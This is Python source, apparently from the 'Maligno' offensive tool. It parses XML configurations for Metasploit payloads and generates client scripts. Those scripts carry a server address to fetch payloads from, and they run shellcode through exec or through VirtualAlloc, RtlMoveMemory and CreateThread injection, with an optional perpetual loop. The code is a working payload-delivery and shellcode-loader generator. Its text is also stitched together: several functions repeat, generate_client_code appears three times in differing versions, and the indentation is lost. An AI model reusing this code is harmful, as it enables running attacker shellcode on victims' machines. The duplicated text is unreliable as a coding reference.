def get_scope_config(config_file):
tree = None
root = None
check_file_exists(config_file)
section = "ServerConfig -> Scope"
try:
tree = ET.parse(config_file)
root = tree.getroot()
except:
malout.print_config_error(config_file, section, "", malout.INVALID_CHARS)
sys.exit()
scope = []
try:
for child in root.find("Scope"):
ip = child.text
if ip:
if ip.find("/") > -1:
for c in ipcalc.Network(ip):
scope.append(str(c))
else:
scope.append(ip)
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, config_file))
sys.exit()
if not scope:
malout.print_config_error(config_file, section, "network", malout.EMPTY_VALUE)
sys.exit()
return scope
def get_profile_client_header_config(profile_file):
tree = None
root = None
check_file_exists(profile_file)
section = "ProfileConfig -> Client"
try:
tree = ET.parse(profile_file)
root = tree.getroot()
except:
malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS)
sys.exit()
tmp = []
config = []
try:
resp = root.find("Client")
for child in resp.findall("header"):
for c in child:
tmp.append([c.tag, c.text])
config.append(dict(tmp))
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file))
sys.exit()
return config
def get_server_config(config_file):
tree = None
root = None
check_file_exists(config_file)
section = "ServerConfig -> Server"
try:
tree = ET.parse(config_file)
root = tree.getroot()
except:
malout.print_config_error(config_file, section, "", malout.INVALID_CHARS)
sys.exit()
config = []
try:
for child in root.find("Server"):
if child.text:
config.append([child.tag, child.text])
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, config_file))
sys.exit()
if not config:
malout.print_error(malout.EMPTY_SECTION % (section, config_file))
sys.exit()
config = dict(config)
try:
if not config["threading"] or not config["addr"] or not config["port"] or not config["ssl"] or not config["sslcert"] or not config["proxy"] or not config["proxyport"] or not config["profile"] or not config["failsafe"]:
raise KeyError
check_host_value(config["addr"], "addr")
check_legal_port(config["port"], "port")
check_legal_port(config["proxyport"], "proxyport")
check_boolean_value(config["ssl"], "ssl")
check_boolean_value(config["proxy"], "proxy")
check_boolean_value(config["threading"], "threading")
check_boolean_value(config["failsafe"], "failsafe")
except KeyError as key:
malout.print_config_error(config_file, section, key, malout.EMPTY_VALUE)
sys.exit()
except malex.IllegalHostValue as v:
malout.print_config_error(config_file, section, v, malout.INVALID_HOST)
sys.exit()
except malex.IllegalPort as p:
malout.print_config_error(config_file, section, p, malout.INVALID_PORT)
sys.exit()
except malex.NotBoolean as b:
malout.print_config_error(config_file, section, b, malout.BOOLEAN_VALUE)
sys.exit()
return config
def check_file_exists(filename):
if not os.path.exists(filename):
malout.print_error("File \"%s\" cannot be found.\n" % filename)
sys.exit()
if not os.path.isfile(filename):
malout.print_error("File \"%s\" is a directory or not a regular file.\n" % filename)
sys.exit()
def get_profile_request_config(profile_file):
tree = None
root = None
check_file_exists(profile_file)
section = "ProfileConfig -> Server -> Request"
try:
tree = ET.parse(profile_file)
root = tree.getroot()
except:
malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS)
sys.exit()
config = []
try:
req = root.find("Server").find("Request")
for child in req:
if child.text:
config.append([child.tag, child.text])
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file))
sys.exit()
if not config:
malout.print_error(malout.EMPTY_SECTION % (section, profile_file))
sys.exit()
config = dict(config)
try:
if not config["method"] or not config["page"] or not config["parameter"] or not config["location"]:
raise KeyError
check_legal_http_method(config["method"], "method")
check_legal_parameter_location(config["location"], "location")
check_legal_parameter_config(config["method"], config["location"], "location")
except KeyError as key:
malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE)
sys.exit()
except malex.IllegalMethod as m:
malout.print_config_error(profile_file, section, m, malout.INVALID_METHOD)
sys.exit()
except malex.IllegalLocation as l:
malout.print_config_error(profile_file, section, l, malout.INVALID_LOCATION)
sys.exit()
except malex.IllegalConfig as l:
malout.print_config_error(profile_file, section, l, malout.INVALID_LOCATION_METHOD)
sys.exit()
return config
def get_client_template(template_file):
try:
fr = open(template_file, 'r')
content = fr.read().splitlines()
fr.close()
except IOError:
malout.print_error("Could not find %s." % template_file)
sys.exit()
return content
def get_client_template(template_file):
try:
fr = open(template_file, "r")
content = fr.read().splitlines()
fr.close()
except IOError:
malout.print_error("Could not find %s." % template_file)
sys.exit()
return content
def get_profile_response_config(profile_file):
tree = None
root = None
check_file_exists(profile_file)
section = "ProfileConfig -> Server -> Response"
try:
tree = ET.parse(profile_file)
root = tree.getroot()
except:
malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS)
sys.exit()
config = []
try:
resp = root.find("Server").find("Response")
for child in resp:
if child.text and child.tag != "header" and child.tag != "body":
config.append([child.tag, child.text])
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file))
sys.exit()
if not config:
malout.print_error(malout.EMPTY_SECTION % (section, profile_file))
sys.exit()
config = dict(config)
try:
if not config["protocol"] or not config["banner"] or not config["lastresort"] or not config["errortemplate"]:
raise KeyError
check_legal_protocol(config["protocol"], "protocol")
check_file_path(config["errortemplate"], "errortemplate")
except KeyError as key:
malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE)
sys.exit()
except malex.IllegalProtocol as p:
malout.print_config_error(profile_file, section, p, malout.INVALID_PROTOCOL)
sys.exit()
except IOError as f:
malout.print_config_error(profile_file, section, f, malout.FILE_NOT_FOUND)
sys.exit()
return config
def generate_client_file(script_code, output_file):
try:
fw = open(output_file, "w")
fw.write("#!/usr/bin/python\n")
for line in script_code:
fw.write(line + "\n")
fw.close()
malout.print_ok('Client file "%s" successfully written!\n' % output_file)
except IOError:
malout.print_error("Could not save client code in %s.\n" % output_file)
return
def generate_client_file(script_code, output_file):
try:
fw = open(output_file, 'w')
fw.write("#!/usr/bin/python\n")
for line in script_code:
fw.write(line + "\n")
fw.close()
malout.print_ok("Client file \"%s\" successfully written!\n" %
output_file)
except IOError:
malout.print_error("Could not save client code in %s.\n" % output_file)
return
def get_profile_client_config(profile_file):
tree = None
root = None
check_file_exists(profile_file)
section = "ProfileConfig -> Client"
try:
tree = ET.parse(profile_file)
root = tree.getroot()
except:
malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS)
sys.exit()
config = []
try:
for child in root.find("Client"):
if child.text:
config.append([child.tag, child.text])
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file))
sys.exit()
if not config:
malout.print_error(malout.EMPTY_SECTION % (section, profile_file))
sys.exit()
config = dict(config)
try:
if not config["maxnaptime"]:
raise KeyError
check_non_negative_value(config["maxnaptime"], "maxnaptime")
except KeyError as key:
malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE)
sys.exit()
except malex.NegativeValue as n:
malout.print_config_error(profile_file, section, n, malout.NON_NEGATIVE_VALUE)
sys.exit()
return config
def get_metasploit_config(config_file):
tree = None
root = None
check_file_exists(config_file)
section = "ServerConfig -> Metasploit"
try:
tree = ET.parse(config_file)
root = tree.getroot()
except:
malout.print_config_error(config_file, section, "", malout.INVALID_CHARS)
sys.exit()
config = []
try:
for child in root.find("Metasploit"):
if child.text and child.tag != "msfpayload":
config.append([child.tag, child.text])
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, config_file))
sys.exit()
if not config:
malout.print_error(malout.EMPTY_SECTION % (section, config_file))
sys.exit()
config = dict(config)
try:
if not config["path"] or not config["cachefolder"] or not config["resourcefolder"]:
raise KeyError
check_file_path(config["path"] + "msfvenom", "path")
except KeyError as key:
malout.print_config_error(config_file, section, key, malout.EMPTY_VALUE)
sys.exit()
except IOError as i:
malout.print_config_error(config_file, section, i, malout.PATH_MSFVENOM)
sys.exit()
return config
def check_for_updates(version):
try:
http_conn = httplib.HTTPConnection("www.encripto.no", 80, timeout=10)
headers = {"User-Agent": "Mozilla/5.0 (compatible; Maligno-Srv/" + version + ")"}
http_conn.request("HEAD", "/tools/maligno-" + version + ".tar.gz", None, headers)
http_resp = http_conn.getresponse()
if http_resp.status == 404:
print ""
malout.print_ok("There is a new version of Maligno!")
malout.print_ok("Check http://www.encripto.no/tools for more information.\n")
elif http_resp.status == 200:
malout.print_ok("You are running the latest version of Maligno.\n")
http_conn.close()
except:
malout.print_error("Could not check for updates...\n")
return
def generate_client_code(
server_config,
profile_request_config,
profile_response_config,
profile_network_config,
profile_client_config,
profile_client_header_config,
client_template,
msfpayload,
package,
standalone,
):
client_code = []
get_caught_mode = False
if int(profile_network_config["getcaught"]) > 1:
get_caught_mode = True
for template_line in client_template:
if template_line == "<CONFIG>":
req_prefix = ""
req_suffix = ""
resp_prefix = ""
resp_suffix = ""
try:
req_prefix = urllib.unquote(profile_request_config["prefix"])
except KeyError:
pass
try:
req_suffix = urllib.unquote(profile_request_config["suffix"])
except KeyError:
pass
try:
resp_prefix = urllib.unquote(profile_response_config["prefix"])
except KeyError:
pass
try:
resp_suffix = urllib.unquote(profile_response_config["suffix"])
except KeyError:
pass
client_code.append('cfg_encoding_method = "' + profile_network_config["encoding"] + '"')
client_code.append("cfg_encoding_rounds = " + profile_network_config["rounds"] + "")
client_code.append('cfg_secret = "' + profile_network_config["secret"] + '"')
client_code.append('cfg_http_method = "' + profile_request_config["method"] + '"')
client_code.append('cfg_req_page = "' + profile_request_config["page"] + '"')
client_code.append('cfg_req_param = "' + profile_request_config["parameter"] + '"')
client_code.append('cfg_param_location = "' + profile_request_config["location"] + '"')
client_code.append('cfg_req_prefix = "' + req_prefix + '"')
client_code.append('cfg_req_suffix = "' + req_suffix + '"')
client_code.append('cfg_resp_prefix = "' + resp_prefix + '"')
client_code.append('cfg_resp_suffix = "' + resp_suffix + '"')
client_code.append('cfg_payload_id = "' + str(msfpayload["id"]) + '"')
client_code.append("cfg_max_nap_time = " + profile_client_config["maxnaptime"] + "")
client_code.append('cfg_server_addr = "' + server_config["addr"] + '"')
client_code.append('cfg_server_port = "' + server_config["port"] + '"')
client_code.append("cfg_get_caught = " + str(profile_network_config["getcaught"]) + "")
client_code.append("cfg_req_delay = " + str(profile_network_config["reqdelay"]) + "")
if profile_response_config["protocol"].upper() == "HTTP/1.0":
client_code.append("cfg_http_10 = True")
else:
client_code.append("cfg_http_10 = False")
if server_config["ssl"].upper() in ["TRUE"]:
client_code.append("cfg_ssl = True")
else:
client_code.append("cfg_ssl = False")
if server_config["failsafe"].upper() in ["TRUE"]:
client_code.append("cfg_failsafe = True")
else:
client_code.append("cfg_failsafe = False")
code_line = "cfg_http_headers = [ "
if profile_client_header_config:
header_count = 1
cookie_processed = False
for header in profile_client_header_config:
if header:
if str(header["field"]).rstrip().lstrip().upper() in ["COOKIE"] and profile_request_config[
"location"
].upper() in ["COOKIE"]:
req_cookie = ""
if header["value"]:
req_cookie += str(header["value"]).rstrip().lstrip()
if len(req_prefix) > 0:
req_cookie += "; %s; " % (req_prefix)
req_cookie += "%s=%s" % (
str(profile_request_config["parameter"]).rstrip().lstrip(),
str(msfpayload["id"]).rstrip().lstrip(),
)
if len(req_suffix) > 0:
req_cookie += "; %s" % (req_suffix)
code_line += '{ "field":"%s", "value":"%s" }' % (
str(header["field"]).rstrip().lstrip(),
urllib.unquote(req_cookie),
)
cookie_processed = True
elif server_config["failsafe"].upper() in ["TRUE"] and str(
header["field"]
).rstrip().lstrip().upper() in ["CONTENT-MD5"]:
malout.print_error("Failsafe mode is enabled and it actively uses a Content-MD5 header.")
malout.print_error("Ignoring Content-MD5 client header...")
else:
code_line += '{ "field":"%s", "value":"%s" }' % (
str(header["field"]).rstrip().lstrip(),
str(header["value"]).rstrip().lstrip(),
)
header_count += 1
else:
print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n"
if header_count <= len(profile_client_header_config):
code_line += ", "
else:
if profile_request_config["location"].upper() in ["COOKIE"] and not cookie_processed:
req_cookie = ""
if len(req_prefix) > 0:
req_cookie += "%s; " % (req_prefix)
req_cookie += "%s=%s" % (
str(profile_request_config["parameter"]).rstrip().lstrip(),
str(msfpayload["id"]).rstrip().lstrip(),
)
if len(req_suffix) > 0:
req_cookie += "; %s" % (req_suffix)
code_line += ', { "field":"Cookie", "value":"%s" }' % (urllib.unquote(req_cookie))
code_line += " ]"
client_code.append(code_line)
elif template_line == " <CTEXT>":
client_code.append(' m_ctext = "' + package + '"')
elif template_line == " <EXECUTION>":
if not get_caught_mode or standalone:
if msfpayload["payload"].find("python") > -1:
code_line = " exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]](m_shellcode)))"
else:
if msfpayload["perpetual"].upper() in ["TRUE"]:
code_line = """ m_shellcode = m_shellcode.decode("string_escape")
m_shellcode = bytearray(m_shellcode)
while(1):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode)))
bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode)))
thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))
sleep(30)"""
else:
code_line = """ m_shellcode = m_shellcode.decode("string_escape")
m_shellcode = bytearray(m_shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode)))
bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode)))
thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))"""
else:
code_line = " pass"
client_code.append(code_line)
elif template_line.startswith("#"):
continue
else:
client_code.append(template_line)
return client_code
def generate_client_code(server_config, profile_request_config,
profile_response_config, profile_network_config,
profile_client_config, profile_client_header_config,
client_template, msfpayload, package, standalone):
client_code = []
get_caught_mode = False
if int(profile_network_config["getcaught"]) > 1:
get_caught_mode = True
for template_line in client_template:
if template_line == "<CONFIG>":
req_prefix = ""
req_suffix = ""
resp_prefix = ""
resp_suffix = ""
try:
req_prefix = urllib.unquote(profile_request_config["prefix"])
except KeyError:
pass
try:
req_suffix = urllib.unquote(profile_request_config["suffix"])
except KeyError:
pass
try:
resp_prefix = urllib.unquote(profile_response_config["prefix"])
except KeyError:
pass
try:
resp_suffix = urllib.unquote(profile_response_config["suffix"])
except KeyError:
pass
client_code.append("cfg_encoding_method = \"" +
profile_network_config["encoding"] + "\"")
client_code.append("cfg_encoding_rounds = " +
profile_network_config["rounds"] + "")
client_code.append("cfg_secret = \"" +
profile_network_config["secret"] + "\"")
client_code.append("cfg_http_method = \"" +
profile_request_config["method"] + "\"")
client_code.append("cfg_req_page = \"" +
profile_request_config["page"] + "\"")
client_code.append("cfg_req_param = \"" +
profile_request_config["parameter"] + "\"")
client_code.append("cfg_param_location = \"" +
profile_request_config["location"] + "\"")
client_code.append("cfg_req_prefix = \"" + req_prefix + "\"")
client_code.append("cfg_req_suffix = \"" + req_suffix + "\"")
client_code.append("cfg_resp_prefix = \"" + resp_prefix + "\"")
client_code.append("cfg_resp_suffix = \"" + resp_suffix + "\"")
client_code.append("cfg_payload_id = \"" + str(msfpayload["id"]) +
"\"")
client_code.append("cfg_max_nap_time = " +
profile_client_config["maxnaptime"] + "")
client_code.append("cfg_server_addr = \"" + server_config["addr"] +
"\"")
client_code.append("cfg_server_port = \"" + server_config["port"] +
"\"")
client_code.append("cfg_get_caught = " +
str(profile_network_config["getcaught"]) + "")
client_code.append("cfg_req_delay = " +
str(profile_network_config["reqdelay"]) + "")
if profile_response_config["protocol"].upper() == "HTTP/1.0":
client_code.append("cfg_http_10 = True")
else:
client_code.append("cfg_http_10 = False")
if server_config["ssl"].upper() in ["TRUE"]:
client_code.append("cfg_ssl = True")
else:
client_code.append("cfg_ssl = False")
if server_config["failsafe"].upper() in ["TRUE"]:
client_code.append("cfg_failsafe = True")
else:
client_code.append("cfg_failsafe = False")
code_line = "cfg_http_headers = [ "
if profile_client_header_config:
header_count = 1
cookie_processed = False
for header in profile_client_header_config:
if header:
if str(header["field"]).rstrip().lstrip().upper() in [
"COOKIE"
] and profile_request_config["location"].upper() in [
"COOKIE"
]:
req_cookie = ""
if header["value"]:
req_cookie += str(
header["value"]).rstrip().lstrip()
if len(req_prefix) > 0:
req_cookie += "; %s; " % (req_prefix)
req_cookie += "%s=%s" % (str(
profile_request_config["parameter"]).rstrip(
).lstrip(), str(
msfpayload["id"]).rstrip().lstrip())
if len(req_suffix) > 0:
req_cookie += "; %s" % (req_suffix)
code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % (
str(header["field"]).rstrip().lstrip(),
urllib.unquote(req_cookie))
cookie_processed = True
elif server_config["failsafe"].upper() in [
"TRUE"
] and str(
header["field"]).rstrip().lstrip().upper() in [
"CONTENT-MD5"
]:
malout.print_error(
"Failsafe mode is enabled and it actively uses a Content-MD5 header."
)
malout.print_error(
"Ignoring Content-MD5 client header...")
else:
code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % (
str(header["field"]).rstrip().lstrip(),
str(header["value"]).rstrip().lstrip())
header_count += 1
else:
print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n"
if header_count <= len(profile_client_header_config):
code_line += ", "
else:
if profile_request_config["location"].upper() in [
"COOKIE"
] and not cookie_processed:
req_cookie = ""
if len(req_prefix) > 0:
req_cookie += "%s; " % (req_prefix)
req_cookie += "%s=%s" % (str(
profile_request_config["parameter"]).rstrip(
).lstrip(), str(
msfpayload["id"]).rstrip().lstrip())
if len(req_suffix) > 0:
req_cookie += "; %s" % (req_suffix)
code_line += ", { \"field\":\"Cookie\", \"value\":\"%s\" }" % (
urllib.unquote(req_cookie))
code_line += " ]"
client_code.append(code_line)
elif template_line == " <CTEXT>":
client_code.append(" m_ctext = \"" + package + "\"")
elif template_line == " <EXECUTION>":
if not get_caught_mode or standalone:
if msfpayload["payload"].find("python") > -1:
code_line = " exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]](m_shellcode)))"
else:
if msfpayload["perpetual"].upper() in ["TRUE"]:
code_line = """ m_shellcode = m_shellcode.decode("string_escape")
m_shellcode = bytearray(m_shellcode)
while(1):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode)))
bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode)))
thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))
sleep(30)"""
else:
code_line = """ m_shellcode = m_shellcode.decode("string_escape")
m_shellcode = bytearray(m_shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode)))
bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode)))
thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))"""
else:
code_line = " pass"
client_code.append(code_line)
elif template_line.startswith("#"):
continue
else:
client_code.append(template_line)
return client_code
def get_profile_network_config(profile_file):
tree = None
root = None
check_file_exists(profile_file)
section = "ProfileConfig -> Network"
try:
tree = ET.parse(profile_file)
root = tree.getroot()
except:
malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS)
sys.exit()
config = []
try:
for child in root.find("Network"):
if child.text:
config.append([child.tag, child.text])
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file))
sys.exit()
if not config:
malout.print_error(malout.EMPTY_SECTION % (section, profile_file))
sys.exit()
config = dict(config)
try:
if not config["encoding"] or not config["rounds"] or not config["blocksize"] or not config["paddingchar"] or not config["secret"] or not config["getcaught"] or not config["reqdelay"]:
raise KeyError
check_encoding_value(config["encoding"], "encoding")
check_non_negative_value(config["getcaught"], "getcaught")
check_non_negative_value(config["reqdelay"], "reqdelay")
check_positive_value(config["rounds"], "rounds")
check_block_size(config["blocksize"], "blocksize")
check_key_length(config["blocksize"], config["secret"], "secret")
except KeyError as key:
malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE)
sys.exit()
except malex.IllegalEncoding as e:
malout.print_config_error(profile_file, section, e, malout.ENCODING_VALUE)
sys.exit()
except malex.NegativeValue as n:
malout.print_config_error(profile_file, section, n, malout.NON_NEGATIVE_VALUE)
sys.exit()
except malex.NonNegativeValue as n:
malout.print_config_error(profile_file, section, n, malout.POSITIVE_VALUE)
sys.exit()
except malex.IllegalBlockSize as b:
malout.print_config_error(profile_file, section, b, malout.BLOCK_SIZE_VALUE)
sys.exit()
except malex.IllegalKeySize as k:
malout.print_config_error(profile_file, section, k, malout.KEY_SIZE_VALUE)
sys.exit()
return config
def generate_client_code(server_config, profile_request_config,
profile_response_config, profile_network_config,
profile_client_config, profile_client_header_config,
client_template, msfpayload, package, standalone):
client_code = []
get_caught_mode = False
if int(profile_network_config["getcaught"]) > 1:
get_caught_mode = True
for template_line in client_template:
if template_line == "<CONFIG>":
req_prefix = ""
req_suffix = ""
resp_prefix = ""
resp_suffix = ""
try:
req_prefix = urllib.unquote(profile_request_config["prefix"])
except KeyError:
pass
try:
req_suffix = urllib.unquote(profile_request_config["suffix"])
except KeyError:
pass
try:
resp_prefix = urllib.unquote(profile_response_config["prefix"])
except KeyError:
pass
try:
resp_suffix = urllib.unquote(profile_response_config["suffix"])
except KeyError:
pass
client_code.append("cfg_encoding_method = \"" +
profile_network_config["encoding"] + "\"")
client_code.append("cfg_encoding_rounds = " +
profile_network_config["rounds"] + "")
client_code.append("cfg_secret = \"" +
profile_network_config["secret"] + "\"")
client_code.append("cfg_http_method = \"" +
profile_request_config["method"] + "\"")
client_code.append("cfg_req_page = \"" +
profile_request_config["page"] + "\"")
client_code.append("cfg_req_param = \"" +
profile_request_config["parameter"] + "\"")
client_code.append("cfg_param_location = \"" +
profile_request_config["location"] + "\"")
client_code.append("cfg_req_prefix = \"" + req_prefix + "\"")
client_code.append("cfg_req_suffix = \"" + req_suffix + "\"")
client_code.append("cfg_resp_prefix = \"" + resp_prefix + "\"")
client_code.append("cfg_resp_suffix = \"" + resp_suffix + "\"")
client_code.append("cfg_payload_id = \"" + str(msfpayload["id"]) +
"\"")
client_code.append("cfg_max_nap_time = " +
profile_client_config["maxnaptime"] + "")
client_code.append("cfg_server_addr = \"" + server_config["addr"] +
"\"")
client_code.append("cfg_server_port = \"" + server_config["port"] +
"\"")
client_code.append("cfg_get_caught = " +
str(profile_network_config["getcaught"]) + "")
client_code.append("cfg_req_delay = " +
str(profile_network_config["reqdelay"]) + "")
if profile_response_config["protocol"].upper() == "HTTP/1.0":
client_code.append("cfg_http_10 = True")
else:
client_code.append("cfg_http_10 = False")
if server_config["ssl"].upper() in ["TRUE"]:
client_code.append("cfg_ssl = True")
else:
client_code.append("cfg_ssl = False")
if server_config["failsafe"].upper() in ["TRUE"]:
client_code.append("cfg_failsafe = True")
else:
client_code.append("cfg_failsafe = False")
if msfpayload["payload"].find("python") > -1:
client_code.append("cfg_payload_type = 0")
else:
client_code.append("cfg_payload_type = 1")
if msfpayload["perpetual"].upper() in ["TRUE"]:
client_code.append("cfg_perpetual_payload = True")
else:
client_code.append("cfg_perpetual_payload = False")
code_line = "cfg_http_headers = [ "
if profile_client_header_config:
header_count = 1
cookie_processed = False
for header in profile_client_header_config:
if header:
if str(header["field"]).rstrip().lstrip().upper() in [
"COOKIE"
] and profile_request_config["location"].upper() in [
"COOKIE"
]:
req_cookie = ""
if header["value"]:
req_cookie += str(
header["value"]).rstrip().lstrip()
if len(req_prefix) > 0:
req_cookie += "; %s; " % (req_prefix)
req_cookie += "%s=%s" % (str(
profile_request_config["parameter"]).rstrip(
).lstrip(), str(
msfpayload["id"]).rstrip().lstrip())
if len(req_suffix) > 0:
req_cookie += "; %s" % (req_suffix)
code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % (
str(header["field"]).rstrip().lstrip(),
urllib.unquote(req_cookie))
cookie_processed = True
elif server_config["failsafe"].upper() in [
"TRUE"
] and str(
header["field"]).rstrip().lstrip().upper() in [
"CONTENT-MD5"
]:
malout.print_error(
"Failsafe mode is enabled and it actively uses a Content-MD5 header."
)
malout.print_error(
"Ignoring Content-MD5 client header...")
else:
code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % (
str(header["field"]).rstrip().lstrip(),
str(header["value"]).rstrip().lstrip())
header_count += 1
else:
print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n"
if header_count <= len(profile_client_header_config):
code_line += ", "
else:
if profile_request_config["location"].upper() in [
"COOKIE"
] and not cookie_processed:
req_cookie = ""
if len(req_prefix) > 0:
req_cookie += "%s; " % (req_prefix)
req_cookie += "%s=%s" % (str(
profile_request_config["parameter"]).rstrip(
).lstrip(), str(
msfpayload["id"]).rstrip().lstrip())
if len(req_suffix) > 0:
req_cookie += "; %s" % (req_suffix)
code_line += ", { \"field\":\"Cookie\", \"value\":\"%s\" }" % (
urllib.unquote(req_cookie))
code_line += " ]"
client_code.append(code_line)
elif template_line == " <CTEXT>":
client_code.append(" m_ctext = \"" + package + "\"")
elif template_line.startswith("#"):
continue
else:
client_code.append(template_line)
return client_code
def get_payload_config(config_file):
tree = None
root = None
check_file_exists(config_file)
section = "ServerConfig -> Metasploit -> msfpayload"
try:
tree = ET.parse(config_file)
root = tree.getroot()
except:
malout.print_config_error(config_file, section, "", malout.INVALID_CHARS)
sys.exit()
tmp = []
config = []
try:
msf = root.find("Metasploit")
for child in msf.findall("msfpayload"):
for c in child:
tmp.append([c.tag, c.text])
config.append(dict(tmp))
except TypeError:
malout.print_error(malout.NO_SECTION_FOUND % (section, config_file))
sys.exit()
if not config:
malout.print_error(malout.EMPTY_SECTION % (section, config_file))
sys.exit()
try:
for p in config:
if not p["id"] or not p["payload"] or not p["lhost"] or not p["lport"] or not p["encoder"] or not p["badchars"] or not p["iterations"] or not p["perpetual"]:
raise KeyError
check_host_value(p["lhost"], "lhost")
check_legal_port(p["lport"], "lport")
check_positive_value(p["iterations"], "iterations")
check_boolean_value(p["perpetual"], "perpetual")
except KeyError as key:
malout.print_config_error(config_file, section, key, malout.EMPTY_VALUE)
sys.exit()
except malex.IllegalHostValue as v:
malout.print_config_error(config_file, section, v, malout.INVALID_HOST)
sys.exit()
except malex.IllegalPort as p:
malout.print_config_error(config_file, section, p, malout.INVALID_PORT)
sys.exit()
except malex.NonNegativeValue as v:
malout.print_config_error(config_file, section, v, malout.POSITIVE_VALUE)
sys.exit()
except malex.NotBoolean as b:
malout.print_config_error(config_file, section, b, malout.BOOLEAN_VALUE)
sys.exit()
return config
